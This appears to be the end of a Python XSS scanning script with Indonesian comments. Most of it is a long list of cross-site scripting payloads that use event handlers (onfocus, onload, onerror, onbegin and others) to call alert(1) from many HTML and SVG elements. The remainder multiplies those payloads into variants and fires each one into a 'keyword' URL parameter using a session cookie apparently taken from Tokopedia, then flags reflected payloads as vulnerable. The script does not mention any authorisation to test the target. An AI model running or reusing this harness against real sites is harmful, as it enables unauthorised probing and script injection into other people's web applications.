"<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus>",
"<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus>",
"<img id=x tabindex=1 onfocus=alert(1)></img>",
"<img id=x tabindex=1 onfocusin=alert(1)></img>",
"<img src/onerror=alert(1)>",
"<img src=validimage.png onload=alert(1)>",
"<img src=validimage.png onloadend=alert(1)>",
"<img src=validimage.png onloadstart=alert(1)>",
"<img srcset=1 onerror=alert(1)>",
"<img srcset=validimage.png onload=alert(1)>",
"<input autofocus onfocus=alert(1)>",
"<input autofocus onfocusin=alert(1)>",
"<input id=x onfocus=alert(1)>",
"<input id=x onfocusin=alert(1)>",
"<input id=x tabindex=1 onactivate=alert(1)></input>",
"<input id=x tabindex=1 onbeforeactivate=alert(1)></input>",
"<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus>",
"<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus>",
"<input onauxclick=alert(1)>",
"<input type=checkbox id=x onfocus=alert(1)>",
"<input type=checkbox id=x onfocusin=alert(1)>",
"<input type=image onloadend=alert(1) src=validimage.png>",
"<input type=image onloadstart=alert(1) src=validimage.png>",
"<input type=image src=1 onerror=alert(1)>",
"<input type=image src=validimage.png onload=alert(1)>",
"<input type=radio id=x onfocus=alert(1)>",
"<input type=radio id=x onfocusin=alert(1)>",
"<ins id=x tabindex=1 onactivate=alert(1)></ins>",
"<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins>",
"<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus>",
"<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus>",
"<ins id=x tabindex=1 onfocus=alert(1)></ins>",
"<ins id=x tabindex=1 onfocusin=alert(1)></ins>",
"<isindex id=x tabindex=1 onactivate=alert(1)></isindex>",
"<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex>",
"<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus>",
"<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus>",
"<isindex id=x tabindex=1 onfocus=alert(1)></isindex>",
"<isindex id=x tabindex=1 onfocusin=alert(1)></isindex>",
"<kbd id=x tabindex=1 onactivate=alert(1)></kbd>",
"<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd>",
"<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus>",
"<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus>",
"<kbd id=x tabindex=1 onfocus=alert(1)></kbd>",
"<kbd id=x tabindex=1 onfocusin=alert(1)></kbd>",
"<keygen id=x onfocus=alert(1)>",
"<keygen id=x onfocusin=alert(1)>",
"<keygen id=x tabindex=1 onactivate=alert(1)></keygen>",
"<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen>",
"<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus>",
"<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus>",
"<label id=x tabindex=1 onactivate=alert(1)></label>",
"<label id=x tabindex=1 onbeforeactivate=alert(1)></label>",
"<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus>",
"<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus>",
"<label id=x tabindex=1 onfocus=alert(1)></label>",
"<label id=x tabindex=1 onfocusin=alert(1)></label>",
"<legend id=x tabindex=1 onactivate=alert(1)></legend>",
"<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend>",
"<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus>",
"<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus>",
"<legend id=x tabindex=1 onfocus=alert(1)></legend>",
"<legend id=x tabindex=1 onfocusin=alert(1)></legend>",
"<li id=x tabindex=1 onactivate=alert(1)></li>",
"<li id=x tabindex=1 onbeforeactivate=alert(1)></li>",
"<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus>",
"<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus>",
"<li id=x tabindex=1 onfocus=alert(1)></li>",
"<li id=x tabindex=1 onfocusin=alert(1)></li>",
"<link href=validstyles.css rel=stylesheet onload=alert(1)>",
"<link id=x tabindex=1 onactivate=alert(1)></link>",
"<link id=x tabindex=1 onbeforeactivate=alert(1)></link>",
"<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus>",
"<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus>",
"<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing>",
"<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus>",
"<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus>",
"<listing id=x tabindex=1 onfocus=alert(1)></listing>",
"<listing id=x tabindex=1 onfocusin=alert(1)></listing>",

"<main id=x tabindex=1 onactivate=alert(1)></main>",
"<main id=x tabindex=1 onbeforeactivate=alert(1)></main>",
"<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus>",
"<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus>",
"<main id=x tabindex=1 onfocus=alert(1)></main>",
"<main id=x tabindex=1 onfocusin=alert(1)></main>",
"<map id=x tabindex=1 onactivate=alert(1)></map>",
"<map id=x tabindex=1 onbeforeactivate=alert(1)></map>",
"<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus>",
"<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus>",
"<map id=x tabindex=1 onfocus=alert(1)></map>",
"<map id=x tabindex=1 onfocusin=alert(1)></map>",
"<nobr id=x tabindex=1 onactivate=alert(1)></nobr>",
"<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr>",
"<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus>",
"<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus>",
"<nobr id=x tabindex=1 onfocus=alert(1)></nobr>",
"<nobr id=x tabindex=1 onfocusin=alert(1)></nobr>",
"<noembed id=x tabindex=1 onactivate=alert(1)></noembed>",
"<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed>",
"<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus>",
"<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus>",
"<noembed id=x tabindex=1 onfocus=alert(1)></noembed>",
"<noembed id=x tabindex=1 onfocusin=alert(1)></noembed>",
"<noframes id=x tabindex=1 onactivate=alert(1)></noframes>",
"<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes>",
"<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus>",
"<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus>",
"<noframes id=x tabindex=1 onfocus=alert(1)></noframes>",
"<noframes id=x tabindex=1 onfocusin=alert(1)></noframes>",
"<noscript id=x tabindex=1 onactivate=alert(1)></noscript>",
"<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript>",
"<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus>",
"<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus>",
"<noscript id=x tabindex=1 onfocus=alert(1)></noscript>",
"<noscript id=x tabindex=1 onfocusin=alert(1)></noscript>",
"<object id=x onfocus=alert(1) type=text/html>",
"<object id=x onfocusin=alert(1) type=text/html>",
"<object id=x tabindex=1 onactivate=alert(1)></object>",
"<object id=x tabindex=1 onbeforeactivate=alert(1)></object>",
"<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus>",
"<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus>",
"<ol id=x tabindex=1 onactivate=alert(1)></ol>",
"<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol>",
"<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus>",
"<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus>",
"<ol id=x tabindex=1 onfocus=alert(1)></ol>",
"<ol id=x tabindex=1 onfocusin=alert(1)></ol>",
"<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup>",
"<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup>",
"<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus>",
"<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus>",
"<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup>",
"<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup>",
"<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus>",
"<option id=x tabindex=1 onactivate=alert(1)></option>",
"<option id=x tabindex=1 onbeforeactivate=alert(1)></option>",
"<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus>",
"<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus>",
"<option id=x tabindex=1 onfocus=alert(1)></option>",
"<option id=x tabindex=1 onfocusin=alert(1)></option>",
"<output id=x tabindex=1 onactivate=alert(1)></output>",
"<output id=x tabindex=1 onbeforeactivate=alert(1)></output>",
"<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus>",
"<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus>",
"<output id=x tabindex=1 onfocus=alert(1)></output>",
"<output id=x tabindex=1 onfocusin=alert(1)></output>",
"<p id=x tabindex=1 onactivate=alert(1)></p>",
"<p id=x tabindex=1 onbeforeactivate=alert(1)></p>",
"<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus>",
"<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus>",
"<p id=x tabindex=1 onfocus=alert(1)></p>",
"<p id=x tabindex=1 onfocusin=alert(1)></p>",
"<p onblur=alert(1) tabindex=1 id=x></p><input autofocus>",
"<param id=x tabindex=1 onactivate=alert(1)></param>",
"<param id=x tabindex=1 onbeforeactivate=alert(1)></param>",
"<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus>",
"<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus>",
"<param id=x tabindex=1 onfocus=alert(1)></param>",
"<param id=x tabindex=1 onfocusin=alert(1)></param>",
"<picture id=x tabindex=1 onactivate=alert(1)></picture>",
"<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture>",
"<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus>",
"<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus>",
"<picture id=x tabindex=1 onfocus=alert(1)></picture>",
"<picture id=x tabindex=1 onfocusin=alert(1)></picture>",
"<style onreadystatechange=alert(1)></style>",
"<svg onunload=window.open('javascript:alert(1)')>",
"<svg><a onload=alert(1)></a>",
"<svg><abbr onload=alert(1)></abbr>",
"<svg><acronym onload=alert(1)></acronym>",
"<svg><address onload=alert(1)></address>",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
"<svg><animate onend=alert(1) attributeName=x dur=1s>",
"<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />",
"<svg><animatetransform onbegin=alert(1) attributeName=transform>",
"<svg><animatetransform onend=alert(1) attributeName=transform dur=1s>",
"<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s>",
"<svg><applet onload=alert(1)></applet>",
"<svg><area onload=alert(1)></area>",
"<svg><article onload=alert(1)></article>",
"<svg><aside onload=alert(1)></aside>",
"<svg><audio onload=alert(1)></audio>",
"<svg><b onload=alert(1)></b>",
"<svg><base onload=alert(1)></base>",
"<svg><basefont onload=alert(1)></basefont>",
"<svg><bdi onload=alert(1)></bdi>",
"<svg><bdo onload=alert(1)></bdo>",
"<svg><bgsound onload=alert(1)></bgsound>",
"<svg><big onload=alert(1)></big>",
"<svg><blink onload=alert(1)></blink>",
"<svg><blockquote onload=alert(1)></blockquote>",
"<svg><br onload=alert(1)></br>",
"<svg><button onload=alert(1)></button>",
"<svg><canvas onload=alert(1)></canvas>",
"<svg><caption onload=alert(1)></caption>",
"<svg><center onload=alert(1)></center>",
"<svg><cite onload=alert(1)></cite>",
"<svg><code onload=alert(1)></code>",
"<svg><col onload=alert(1)></col>",
"<svg><colgroup onload=alert(1)></colgroup>",
"<svg><command onload=alert(1)></command>",
"<svg><content onload=alert(1)></content>",
"<svg><data onload=alert(1)></data>",
"<svg><datalist onload=alert(1)></datalist>",
"<svg><dd onload=alert(1)></dd>",
"<svg><del onload=alert(1)></del>",
"<svg><details onload=alert(1)></details>",
"<svg><dfn onload=alert(1)></dfn>",
"<svg><dialog onload=alert(1)></dialog>",
"<svg><dir onload=alert(1)></dir>",
"<svg><discard onbegin=alert(1)>",
"<svg><div onload=alert(1)></div>",
"<svg><dl onload=alert(1)></dl>",
"<svg><dt onload=alert(1)></dt>",
"<svg><element onload=alert(1)></element>",
"<svg><em onload=alert(1)></em>",
"<svg><fieldset onload=alert(1)></fieldset>",
"<svg><figcaption onload=alert(1)></figcaption>",
"<svg><figure onload=alert(1)></figure>",
"<svg><font onload=alert(1)></font>",
"<svg><footer onload=alert(1)></footer>",
"<svg><form onload=alert(1)></form>",
"<svg><frameset onload=alert(1)></frameset>",
"<svg><h1 onload=alert(1)></h1>",
"<svg><head onload=alert(1)></head>",
"<svg><header onload=alert(1)></header>",
"<svg><hgroup onload=alert(1)></hgroup>",
"<svg><hr onload=alert(1)></hr>",
"<svg><html onload=alert(1)></html>",
"<svg><i onload=alert(1)></i>",
"<svg><image href=1 onerror=alert(1)>",
"<svg><image href=validimage.png onload=alert(1)>",
"<svg><ins onload=alert(1)></ins>",
"<svg><kbd onload=alert(1)></kbd>",
"<svg><keygen onload=alert(1)></keygen>",
"<svg><label onload=alert(1)></label>",
"<svg><legend onload=alert(1)></legend>",
"<svg><li onload=alert(1)></li>",
"<svg><listing onload=alert(1)></listing>",
"<svg><main onload=alert(1)></main>",
"<svg><map onload=alert(1)></map>",
"<svg><mark onload=alert(1)></mark>",
"<svg><marquee onload=alert(1)></marquee>",
"<svg><menu onload=alert(1)></menu>",
"<svg><menuitem onload=alert(1)></menuitem>",
"<svg><meta onload=alert(1)></meta>",
"<svg><meter onload=alert(1)></meter>",
"<svg><multicol onload=alert(1)></multicol>",
"<svg><nav onload=alert(1)></nav>",
"<svg><nextid onload=alert(1)></nextid>",
"<svg><nobr onload=alert(1)></nobr>",
"<svg><noembed onload=alert(1)></noembed>",
"<svg><noframes onload=alert(1)></noframes>",
"<svg><noscript onload=alert(1)></noscript>",
"<svg><ol onload=alert(1)></ol>",
"<svg><optgroup onload=alert(1)></optgroup>",
"<svg><option onload=alert(1)></option>",
"<svg><output onload=alert(1)></output>",
"<svg><p onload=alert(1)></p>",
"<svg><param onload=alert(1)></param>",
"<svg><picture onload=alert(1)></picture>",
"<svg><plaintext onload=alert(1)></plaintext>",
"<svg><pre onload=alert(1)></pre>",
"<svg><progress onload=alert(1)></progress>",
"<svg><q onload=alert(1)></q>",
"<svg><rb onload=alert(1)></rb>",
"<svg><rp onload=alert(1)></rp>",
"<svg><rt onload=alert(1)></rt>",
"<svg><rtc onload=alert(1)></rtc>",
"<svg><ruby onload=alert(1)></ruby>",
"<svg><s onload=alert(1)></s>",
"<svg><samp onload=alert(1)></samp>",
"<svg><section onload=alert(1)></section>",
"<svg><select onload=alert(1)></select>",
"<svg><set onbegin=alert(1) attributename=x dur=1s>",
"<svg><set onend=alert(1) attributename=x dur=1s>",
"<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2>",
"<svg><shadow onload=alert(1)></shadow>",
"<svg><slot onload=alert(1)></slot>",
"<svg><small onload=alert(1)></small>",
"<svg><source onload=alert(1)></source>",
"<svg><spacer onload=alert(1)></spacer>",
"<svg><span onload=alert(1)></span>",
"<svg><strike onload=alert(1)></strike>",
"<svg><strong onload=alert(1)></strong>",
"<svg><sub onload=alert(1)></sub>",
"<svg><summary onload=alert(1)></summary>",
"<svg><sup onload=alert(1)></sup>",
"<svg><table onload=alert(1)></table>",
"<svg><tbody onload=alert(1)></tbody>",
"<svg><td onload=alert(1)></td>",
"<svg><template onload=alert(1)></template>",
"<svg><textarea onload=alert(1)></textarea>",
"<svg><tfoot onload=alert(1)></tfoot>",
"<svg><th onload=alert(1)></th>",
"<svg><thead onload=alert(1)></thead>",
"<svg><time onload=alert(1)></time>",
"<svg><title onload=alert(1)></title>",
"<svg><tr onload=alert(1)></tr>",
"<svg><tt onload=alert(1)></tt>",
"<svg><u onload=alert(1)></u>",
"<svg><ul onload=alert(1)></ul>",
"<svg><var onload=alert(1)></var>",
"<svg><video onload=alert(1)></video>",
"<svg><wbr onload=alert(1)></wbr>",
"<svg><xmp onload=alert(1)></xmp>",
"<svg><xss onload=alert(1)></xss>",
"<table id=x tabindex=1 onactivate=alert(1)></table>",
"<table id=x tabindex=1 onbeforeactivate=alert(1)></table>",
"<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus>",
"<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus>",
"<table id=x tabindex=1 onfocus=alert(1)></table>",
"<table id=x tabindex=1 onfocusin=alert(1)></table>",
"<tbody id=x tabindex=1 onactivate=alert(1)></tbody>",
"<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody>",
"<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus>",
"<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus>",
"<tbody id=x tabindex=1 onfocus=alert(1)></tbody>",
"<tbody id=x tabindex=1 onfocusin=alert(1)></tbody>",
"<td id=x tabindex=1 onactivate=alert(1)></td>",
"<td id=x tabindex=1 onbeforeactivate=alert(1)></td>",
"<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus>",
"<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus>",
"<td id=x tabindex=1 onfocus=alert(1)></td>",
"<td id=x tabindex=1 onfocusin=alert(1)></td>",
"<template id=x tabindex=1 onactivate=alert(1)></template>",
"<template id=x tabindex=1 onbeforeactivate=alert(1)></template>",
"<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus>",
"<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus>",
"<template id=x tabindex=1 onfocus=alert(1)></template>",
"<template id=x tabindex=1 onfocusin=alert(1)></template>",
"<textarea id=x tabindex=1 onactivate=alert(1)></textarea>",
"<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea>",
"<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus>",
"<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus>",
"<textarea onauxclick=alert(1)>XSS</textarea>",
"<textarea onbeforecopy=alert(1) autofocus>XSS</textarea>",
"<textarea onbeforecut=alert(1) autofocus>XSS</textarea>",
"<textarea onbeforepaste=alert(1) autofocus></textarea>",
"<textarea onblur=alert(1) id=x></textarea><input autofocus>",
"<textarea onchange=alert(1)>XSS</textarea>",
"<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot>",
"<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot>",
"<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>",
"<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>",
"<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot>",
"<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot>",
"<th id=x tabindex=1 onactivate=alert(1)></th>",
"<th id=x tabindex=1 onbeforeactivate=alert(1)></th>",
"<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus>",
"<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus>",
"<th id=x tabindex=1 onfocus=alert(1)></th>",
"<th id=x tabindex=1 onfocusin=alert(1)></th>",
"<thead id=x tabindex=1 onactivate=alert(1)></thead>",
"<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead>",
"<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus>",
"<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus>",
"<thead id=x tabindex=1 onfocus=alert(1)></thead>",
"<thead id=x tabindex=1 onfocusin=alert(1)></thead>",
"<time id=x tabindex=1 onactivate=alert(1)></time>",
"<time id=x tabindex=1 onbeforeactivate=alert(1)></time>",
"<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus>",
"<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus>",
"<time id=x tabindex=1 onfocus=alert(1)></time>",
"<time id=x tabindex=1 onfocusin=alert(1)></time>",
"<title id=x tabindex=1 onactivate=alert(1)></title>",
"<title id=x tabindex=1 onbeforeactivate=alert(1)></title>",
"<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus>",
"<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus>",
"<title id=x tabindex=1 onfocus=alert(1)></title>",
"<title id=x tabindex=1 onfocusin=alert(1)></title>",
"<tr id=x tabindex=1 onactivate=alert(1)></tr>",
"<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr>",
"<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus>",
"<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus>",
"<tr id=x tabindex=1 onfocus=alert(1)></tr>",
"<tr id=x tabindex=1 onfocusin=alert(1)></tr>",
"<track id=x tabindex=1 onactivate=alert(1)></track>",
"<track id=x tabindex=1 onbeforeactivate=alert(1)></track>",
"<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus>",
"<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus>",
"<track id=x tabindex=1 onfocus=alert(1)></track>",
"<track id=x tabindex=1 onfocusin=alert(1)></track>",
"<tt id=x tabindex=1 onactivate=alert(1)></tt>",
"<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt>",
"<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus>",
"<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus>",
"<tt id=x tabindex=1 onfocus=alert(1)></tt>",
"<tt id=x tabindex=1 onfocusin=alert(1)></tt>",
"<u id=x tabindex=1 onactivate=alert(1)></u>",
"<u id=x tabindex=1 onbeforeactivate=alert(1)></u>",
"<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus>",
"<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus>",
"<u id=x tabindex=1 onfocus=alert(1)></u>",
"<u id=x tabindex=1 onfocusin=alert(1)></u>",
"<ul id=x tabindex=1 onactivate=alert(1)></ul>",
"<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul>",
"<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus>",
"<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus>",
"<ul id=x tabindex=1 onfocus=alert(1)></ul>",
"<ul id=x tabindex=1 onfocusin=alert(1)></ul>",
"<var id=x tabindex=1 onactivate=alert(1)></var>",
"<var id=x tabindex=1 onbeforeactivate=alert(1)></var>",
"<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus>",
"<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus>",
"<var id=x tabindex=1 onfocus=alert(1)></var>",
"<var id=x tabindex=1 onfocusin=alert(1)></var>",
"<video id=x tabindex=1 onactivate=alert(1)></video>",
"<video id=x tabindex=1 onbeforeactivate=alert(1)></video>",
"<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus>",
"<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus>",
"<video src/onerror=alert(1)>",
"<video><source onerror=alert(1) src=1></video>",
"<wbr id=x tabindex=1 onactivate=alert(1)></wbr>",
"<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr>",
"<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus>",
"<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus>",
"<wbr id=x tabindex=1 onfocus=alert(1)></wbr>",
"<wbr id=x tabindex=1 onfocusin=alert(1)></wbr>",
"<xmp id=x tabindex=1 onactivate=alert(1)></xmp>",
"<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp>",
"<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus>",
"<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus>",
"<xmp id=x tabindex=1 onfocus=alert(1)></xmp>",
"<xmp id=x tabindex=1 onfocusin=alert(1)></xmp>",
"<xss id=x tabindex=1 onactivate=alert(1)></xss>",
"<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss>",
"<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus>",
"<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus>",
"<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus>",
"<xss id=x tabindex=1 onfocus=alert(1)></xss>",
"<xss id=x tabindex=1 onfocusin=alert(1)></xss>",
"<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus>",
    ]
    
    combined_payloads = []
    for payload in payloads:
        combined_payloads.append(payload)
        combined_payloads.append(payload.replace('alert', 'console.log'))
        combined_payloads.append(payload + "<--")

    return combined_payloads

if __name__ == "__main__":
    display_welcome()  # Menampilkan sambutan
    
    url = input("Masukkan URL yang ingin diuji: ")
    cookie = get_tokopedia_cookie()

    # Mengambil session dari cookie
    session = requests.Session()
    session.cookies = cookie

    # Menghasilkan payload XSS
    xss_payloads = generate_xss_payloads()
    
    for payload in xss_payloads:
        # Membuat URL dengan payload
        test_url = f"{url}?keyword={payload}"
        
        # Melakukan request ke URL dengan payload
        response = test_xss(test_url, cookie)
        
        # Memeriksa apakah payload muncul dalam respons
        if payload in response:
            print(Fore.GREEN + f"Vulnerable to XSS: {test_url}")
        else:
            print(Fore.RED + f"Not vulnerable to XSS: {test_url}")